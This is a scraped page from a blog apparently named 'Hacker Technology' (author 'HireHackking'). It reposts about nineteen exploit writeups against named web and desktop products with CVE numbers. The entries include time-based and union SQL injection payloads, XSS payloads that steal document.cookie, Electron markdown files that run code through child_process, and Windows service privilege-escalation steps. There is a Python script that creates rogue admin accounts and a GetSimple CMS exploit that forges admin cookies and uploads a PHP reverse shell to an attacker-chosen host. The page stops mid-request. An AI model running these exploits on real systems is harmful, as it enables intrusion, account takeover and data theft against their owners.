Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863115544

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Date: 16/05/2023
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31702

*Step of Reproduction/Proof of concept(POC)*

1. Login into the escan management console with a valid username and
password as root user.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
3. Inject the payload into the UsrId parameter to confirm the SQL
injection as shown below:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR
DELAY '0:0:5'--&cnt=4176
4. The time delay of 5 seconds confirmed that "UsrId" parameter was
vulnerable to SQL Injection. Furthermore, it was also possible to dump
all the databases and inject OS shell directly into the MS SQL Server
using SQLMap tool.
HireHackking 
# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
# Date: 15 May 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://qloapps.com/
# Software Link: https://github.com/webkul/hotelcommerce
# Version: 1.5.2
# Tested on: Kali Linux 2022.4
# CVE : CVE-2023-30256


Description:

A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.

Steps to exploit:
1) Go to Signin page on the system.
2) There are two parameters which can be exploited via XSS
	- back
	- email_create

2.1) Insert your payload in the "back"- GET and POST Request 
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 
	
	Payload (Plain text): 
	xss onfocus=alert(1) autofocus= xss

	Payload (URL Encoded): 
	xss%20onfocus%3dalert(1)%20autofocus%3d%20xss

	Full GET Request (back): 
	[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

2.2) Insert your payload in the "email_create" - POST Request Only
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 

	Payload (Plain text): 
	xss><img src=a onerror=alert(document.cookie)>xss

	Payload (URL Encoded): 
	xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss

	POST Request (email_create) (POST REQUEST DATA ONLY): 
	[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]
HireHackking 
# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
# Date: 2023-05-16
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31703

*Step of Reproduction/ Proof of Concept(POC)*

1. Login into the eScan Management Console with a valid user credential.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
3. Now, Inject the Cross Site Scripting Payload in "from" parameter as
shown below and a valid XSS pop up appeared.
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
4. By exploiting this vulnerability, any arbitrary attacker could have
stolen an admin user session cookie to perform account takeover.
HireHackking 
[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/


[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech


[#] Exploit:

[path]/admin.php?show=reply&id=[Injected Query]


[#] 3xample:

[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -


[#] Notes:
- A normal admin can exploit this vulnerability to escalate his privileges to super admin.
HireHackking

Smart School v1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Smart School v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018 # Demo Site: https://demo.smart-school.in # Tested on: Kali Linux # CVE: N/A ### Request ### POST /course/filterRecords/ HTTP/1.1 Host: localhost Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 136 Origin: https://localhost Referer: https://localhost/course/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1 ### Parameter & Payloads ### Parameter: searchdata[0][searchfield] (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)-- hAHp&searchdata[0][searchvalue]=1
HireHackking

Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution

HACKER · %s · %s

# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution # Date: 2023-04-24 # Exploit Author: 8bitsec # CVE: CVE-2023-31873 # Vendor Homepage: https://github.com/mariuskueng/gin # Software Link: https://github.com/mariuskueng/gin # Version: 0.7.4 # Tested on: [Mac OS 13] Release Date: 2023-04-24 Product & Service Introduction: Javascript Markdown editor for Mac Technical Details & Description: A vulnerability was discovered on Gin markdown editor v0.7.4 allowing a user to execute arbitrary code by opening a specially crafted file. Proof of Concept (PoC): Arbitrary code execution: Create a markdown file (.md) in any text editor and write the following payload: <video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());"> Opening the file in Gin will auto execute the Calculator application.
HireHackking

Stackposts Social Marketing Tool v1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/stackposts-social-marketing-tool/21747459 # Demo Site: https://demo.stackposts.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /spmo/auth/login HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: https://localhost/spmo/ Content-Type: application/x-www-form-urlencoded Accept: application/json, text/javascript, */*; q=0.01 Content-Length: 104 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1* ### Parameter & Payloads ### Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1') AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg
HireHackking

Quicklancer v1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Quicklancer v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135 # Demo Site: https://quicklancer.bylancer.com # Tested on: Kali Linux # CVE: N/A ### Request ### POST /php/user-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2; quickjob_view_counted=31; Quick_lang=arabic Content-Length: 93 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive action=searchStateCountry&dataString=deneme ### Parameter & Payloads ### Parameter: dataString (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068 FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo
HireHackking

FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)

HACKER · %s · %s

# Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) # Date: 2023-05-24 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.squarepiginteractive.com # Software Link: https://www.fusioninvoice.com/store # Version: 2023-1.0 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50) # CVE: CVE-2023-25439 Description: A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker to execute arbitrary web scripts or HTML. Injecting persistent javascript code inside the title and/or description while creating a task/expense/project (and possibly others) it will be triggered once page gets loaded. Steps to reproduce: - Click on "Expenses", or "Tasks" and add (or edit an existing) one, - Insert a payload PoC inside a field, in example in the "Phone number" (or "Description"), - Click on 'Save'. Visiting the website dashboard, as well as the customer or project summary page, the javascript code will be executed. PoC Screenshots: https://imagebin.ca/v/7FOZfztkDs3I
HireHackking

MobileTrans 4.0.11 - Weak Service Privilege Escalation

HACKER · %s · %s

# Exploit Title :MobileTrans 4.0.11 - Weak Service Privilege Escalation # Date: 20 May 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://mobiletrans.wondershare.com/ # Software Link: https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg # Version: MobileTrans version 4.0.11 # Tested on: Window 10 (Version 10.0.19045.2965) # CVE : CVE-2023-31748 Vulnerability Description: MobileTrans is World 1 mobile-to-mobile file transfer application.MobileTrans version 4.0.11 was being suffered a weak service permission vulnerability that allows a normal window user to elevate to local admin. The "ElevationService" service name was installed, while the MobileTrans version 4.0.11 was installed in the window operating system. The service "ElevationService" allows the local user to elevate to the local admin as The "ElevationService" run with system privileges. Effectively, the local user is able to elevate to local admin upon successfully modifying the service or replacing the affected executable. C:\Users\HninKayThayar\Desktop>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe" C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
HireHackking

Service Provider Management System v1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: Service Provider Management System v1.0 - SQL Injection # Date: 2023-05-23 # Exploit Author: Ashik Kunjumon # Vendor Homepage: https://www.sourcecodester.com/users/lewa # Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html # Version: 1.0 # Tested on: Windows/Linux 1. Description: Service Provider Management System v1.0 allows SQL Injection via ID parameter in /php-spms/?page=services/view&id=2 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit the latest vulnerabilities in the underlying database. Endpoint: /php-spms/?page=services/view&id=2 Vulnerable parameter: id (GET) 2. Proof of Concept: ---------------------- Step 1 - By visiting the url: http://localhost/php-spms/?page=services/view&id=2 just add single quote to verify the SQL Injection. Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2" -p id --dbms=mysql SQLMap Response: ---------------------- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=services/view&id=1' AND (SELECT 1072 FROM (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT
HireHackking
# Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation # Date: 20 May 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://filmora.wondershare.com # Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE # Version: Filmora 12 ( Build 1.0.0.7) # Tested on: Windows 10 (Version 10.0.19045.2965) # CVE : CVE-2023-31747 Vulnerability description: Filmora is a professional video editing software. Wondershare NativePush Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The service name "NativePushService" was vulnerable to unquoted service paths vulnerability which led to full local privilege escalation in the affected window operating system as the service "NativePushService" was running with system privilege that the local user has write access to the directory where the service is located. Effectively, the local user is able to elevate to local admin upon successfully replacing the affected executable. C:\sc qc NativePushService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NativePushService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Native Push Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe" C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F HNINKAYTHAYAR\HninKayThayar:(ID)F
HireHackking

Ulicms 2023.1 - create admin user via mass assignment

HACKER · %s · %s

#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: create admin user via mass assignment #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna import requests new_name=input("name: ") new_email=input("email: ") new_pass=input("password: ") url = "http://localhost/dist/admin/index.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language=" response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Request is success and created new admin account") else: print("Request is failure.!!") #POC video : https://youtu.be/SCkRJzJ0FVk
HireHackking

SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)

HACKER · %s · %s

#!/usr/bin/python3 # Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) # Google Dork: intitle:"SCM Manager" intext:1.60 # Date: 05-25-2023 # Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829) # Vendor Homepage: https://scm-manager.org/ # Software Link: https://scm-manager.org/docs/1.x/en/getting-started/ # Version: 1.2 <= 1.60 # Tested on: Debian based # CVE: CVE-2023-33829 # Modules import requests import argparse import sys # Main menu parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit') parser.add_argument("-u", "--user", help="Admin user or user with write permissions") parser.add_argument("-p", "--password", help="password of the user") args = parser.parse_args() # Credentials user = sys.argv[2] password = sys.argv[4] # Global Variables main_url = "http://localhost:8080/scm" # Change URL if its necessary auth_url = main_url + "/api/rest/authentication/login.json" users = main_url + "/api/rest/users.json" groups = main_url + "/api/rest/groups.json" repos = main_url + "/api/rest/repositories.json" # Create a session session = requests.Session() # Credentials to send post_data={ 'username': user, # change if you have any other user with write permissions 'password': password # change if you have any other user with write permissions } r = session.post(auth_url, data=post_data) if r.status_code == 200: print("[+] Authentication successfully") else: print("[-] Failed to authenticate") sys.exit(1) new_user={ "name": "newUser", "displayName": "<img src=x onerror=alert('XSS')>", "mail": "", "password": "", "admin": False, "active": True, "type": "xml" } create_user = session.post(users, json=new_user) print("[+] User with XSS Payload created") new_group={ "name": "newGroup", "description": "<img src=x onerror=alert('XSS')>", "type": "xml" } create_group = session.post(groups, json=new_group) print("[+] Group with XSS Payload created") new_repo={ "name": "newRepo", "type": "svn", "contact": "", "description": "<img src=x onerror=alert('XSS')>", "public": False } create_repo = session.post(repos, json=new_repo) print("[+] Repository with XSS Payload created")
HireHackking

SCRMS 2023-05-27 1.0 - Multiple SQL Injection

HACKER · %s · %s

## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 05.27.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `email` parameter appears to be vulnerable to SQL injection attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or 5206=5213-- were each submitted in the email parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker can easily steal all users and their passwords for access to the system. Even if they are strongly encrypted this will get some time, but this is not a problem for an attacker to decrypt if, if they are not enough strongly encrypted. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: email (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html) ## Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Yank Note v3.52.1 (Electron) - Arbitrary Code Execution

HACKER · %s · %s

# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution # Date: 2023-04-27 # Exploit Author: 8bitsec # CVE: CVE-2023-31874 # Vendor Homepage: yank-note.com # Software Link: https://github.com/purocean/yn # Version: 3.52.1 # Tested on: [Ubuntu 22.04 | Mac OS 13] Release Date: 2023-04-27 Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement Technical Details & Description: A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file. Proof of Concept (PoC): Arbitrary code execution: Create a markdown file (.md) in any text editor and write the following payload. Mac: <iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>"> Ubuntu: <iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>"> Opening the file in Yank Note will auto execute the Calculator application.
HireHackking

LeadPro CRM v1.0 - SQL Injection

HACKER · %s · %s

# Exploit Title: LeadPro CRM v1.0 - SQL Injection # Date: 2023-05-17 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578 # Demo Site: https://demo.leadifly.in # Tested on: Kali Linux # CVE: N/A ### Request ### GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10 HTTP/1.1 Host: localhost Cookie: XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D; leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8 X-Xsrf-Token: eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0= Referer: https://localhost/admin/product Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close ### Parameter & Payloads ### Parameter: filters (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND (8549=8549&order=id desc&offset=0&limit=10
HireHackking

GetSimple CMS v3.3.16 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE) # Data: 18/5/2023 # Exploit Author : Youssef Muhammad # Vendor: Get-simple # Software Link: # Version app: 3.3.16 # Tested on: linux # CVE: CVE-2022-41544 import sys import hashlib import re import requests from xml.etree import ElementTree from threading import Thread import telnetlib purple = "\033[0;35m" reset = "\033[0m" yellow = "\033[93m" blue = "\033[34m" red = "\033[0;31m" def print_the_banner(): print(purple + ''' CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4 C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4 C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444 C V V E 2 00 0 2 2 4 11 5 4 4 CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4 '''+ reset) def get_version(target, path): r = requests.get(f"http://{target}{path}admin/index.php") match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text) if match: version = match.group(1) if version <= "3.3.16": print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544") else: print ("This is not vulnrable to this CVE") return version return None def api_leak(target, path): r = requests.get(f"http://{target}{path}data/other/authorization.xml") if r.ok: tree = ElementTree.fromstring(r.content) apikey = tree[0].text print(f"[+] apikey obtained {apikey}") return apikey return None def set_cookies(username, version, apikey): cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest() cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest() cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}" headers = { 'Content-Type':'application/x-www-form-urlencoded', 'Cookie': cookies } return headers def get_csrf_token(target, path, headers): r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers) m = re.search('nonce" type="hidden" value="(.*)"', r.text) if m: print("[+] csrf token obtained") return m.group(1) return None def upload_shell(target, path, headers, nonce, shell_content): upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true" payload = { 'content': shell_content, 'edited_file': '../shell.php', 'nonce': nonce, 'submitsave': 1 } try: response = requests.post(upload_url, headers=headers, data=payload) if response.status_code == 200: print("[+] Shell uploaded successfully!") else: print("(-) Shell upload failed!") except requests.exceptions.RequestException as e: print("(-) An error occurred while uploading the shell:", e) def shell_trigger(target, path): url = f"http://{target}{path}/shell.php" try: response = requests.get(url) if response.status_code == 200: print("[+] Webshell trigged successfully!") else: print("(-) Failed to visit the page!") except requests.exceptions.RequestException as e: print("(-) An error occurred while visiting the page:", e) def main(): if len(sys.argv) != 5: print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>") return target = sys.argv[1] path = sys.argv[2] if not path.endswith('/'): path += '/' ip, port = sys.argv[3].split(':') username = sys.argv[4] shell_content = f"""<?php $ip = '{ip}'; $port = {port}; $sock = fsockopen($ip, $port); $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes); """ version = get_version(target, path) if not version: print("(-) could not get version") return apikey = api_leak(target, path) if not apikey: print("(-) could not get apikey") return headers = set_cookies(username, version, apikey) nonce = get_csrf_token(target, path, headers) if not nonce: print("(-) could not get nonce") return upload_shell(target, path, headers, nonce, shell_content) shell_trigger(target, path) if __name__ == '__main__': print_the_banner() main()
HireHackking
# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-04-15 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.bludit.com/ # Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1 # Version: 3.14.1 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-31698 SVG Payload ------------- <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> save this SVG file xss.svg Steps to Reproduce: 1. At first login your admin panel. 2. then go to settings and click the logo section. 3. Now upload xss.svg file so your request data will be POST /bludit/admin/ajax/logo-upload HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Content-Type: 